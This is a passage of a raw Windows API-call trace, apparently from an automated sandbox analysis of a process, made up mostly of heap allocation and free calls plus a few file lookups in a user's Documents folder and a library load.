returned 0x2aab0b0 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0215.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0215.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0215.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0215.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0215.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.366] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0215.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0215.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0215.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0215.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.366] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/cyaer-G0v.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28aaa940, ftCreationTime.dwHighDateTime=0x1d586ea, ftLastAccessTime.dwLowDateTime=0x996d7d10, ftLastAccessTime.dwHighDateTime=0x1d563a9, ftLastWriteTime.dwLowDateTime=0x996d7d10, ftLastWriteTime.dwHighDateTime=0x1d563a9, nFileSizeHigh=0x0, nFileSizeLow=0x285b, dwReserved0=0x0, dwReserved1=0x0, cFileName="cyaer-G0v.pptx", cAlternateFileName="CYAER-~1.PPT")) returned 0x9e1db8 [0215.368] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.369] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0215.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.371] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.371] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.371] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0215.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.371] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.371] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.371] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.372] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.372] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0215.372] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.372] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.373] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.373] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 